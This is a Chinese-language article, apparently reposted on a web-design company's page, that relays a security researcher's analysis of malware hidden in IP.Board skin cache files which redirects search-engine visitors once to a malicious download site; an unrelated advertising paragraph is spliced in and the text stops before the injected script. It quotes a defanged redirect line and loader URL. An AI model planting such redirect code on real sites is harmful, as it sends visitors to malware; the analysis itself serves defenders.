新聞中心
IP.Board CMS是一款著名的CMS系統(tǒng),它允許用戶很容易地創(chuàng)建和管理在線社區(qū)。而最近Sucuri的研究員最近發(fā)現(xiàn)了一個(gè)針對(duì)IP.Board的重定向。經(jīng)過(guò)分析,研究員們發(fā)現(xiàn)這種攻擊已經(jīng)持續(xù)了2年之久了。

10年積累的成都網(wǎng)站制作、成都網(wǎng)站設(shè)計(jì)經(jīng)驗(yàn),可以快速應(yīng)對(duì)客戶對(duì)網(wǎng)站的新想法和需求。提供各種問(wèn)題對(duì)應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識(shí)你,你也不認(rèn)識(shí)我。但先網(wǎng)站設(shè)計(jì)后付款的網(wǎng)站建設(shè)流程,更有富順免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。
訪客被惡意重定向
重定向的癥狀非常典型,某些通過(guò)Google搜索的訪客會(huì)被重定向到一個(gè)惡意網(wǎng)站:filestore321 .com/download .php?id=hexnumber。每位訪客只會(huì)被重定向一次,重定向后再點(diǎn)擊不會(huì)被重定向。
我們捕捉HTTP流量后發(fā)現(xiàn),網(wǎng)頁(yè)會(huì)從"hxxp://forum .hackedsite .com/index.php?ipbv=4458734cb50e112ba7dd3a154b22ecd9&g=js"加載腳本,腳本內(nèi)容如下:
document.location='hxxp://filestore321 .com/download .php?id=8-digit-hex-number'
工作原理
那重定向是如何通過(guò)IP.Board運(yùn)行的呢?由于我們對(duì)IP.Board還不是像WordPress那樣了解,因此查找來(lái)源廢了我們一番功夫。我們參考了2年前Peter Upfold的一篇文章。在這篇文章中,我們找到了重定向的工作原理,并且發(fā)現(xiàn)這個(gè)手法兩年前就出現(xiàn)了,而且沒(méi)有重大的改變。
大家并不需要訪問(wèn)Peter Upfold的文章,我會(huì)在此解釋惡意軟件的工作原理和行為模式。
IP.Board使用的皮膚會(huì)同時(shí)儲(chǔ)存在數(shù)據(jù)庫(kù)和硬盤上(以文件形式儲(chǔ)存),如果有緩存的話就會(huì)存儲(chǔ)在./cache/skin_cache/cacheid_n下,n代表皮膚的編號(hào)。我們發(fā)現(xiàn)的受感染的皮膚文件就是./cache/skin_cache/cacheid_4下的skin_global.php文件。
高亮選中的這6行就是我們?cè)谶@個(gè)120kb的皮膚文件找到的惡意代碼。
這三行經(jīng)過(guò)加密的代碼中的變量名用到了$rsa、$pka、$pkb,讓人誤認(rèn)為是什么安全密鑰。
我們還原了經(jīng)過(guò)混淆的代碼,如下圖所示
首先,它會(huì)檢查訪客來(lái)源是否是來(lái)自搜索引擎或者是社交網(wǎng)絡(luò)鏈接并且確認(rèn)不是什么爬蟲(chóng)。如果這是訪客的首次訪問(wèn)(沒(méi)有l(wèi)ang_idcookie),它就會(huì)在網(wǎng)頁(yè)中注入一段腳本:


咨詢
建站咨詢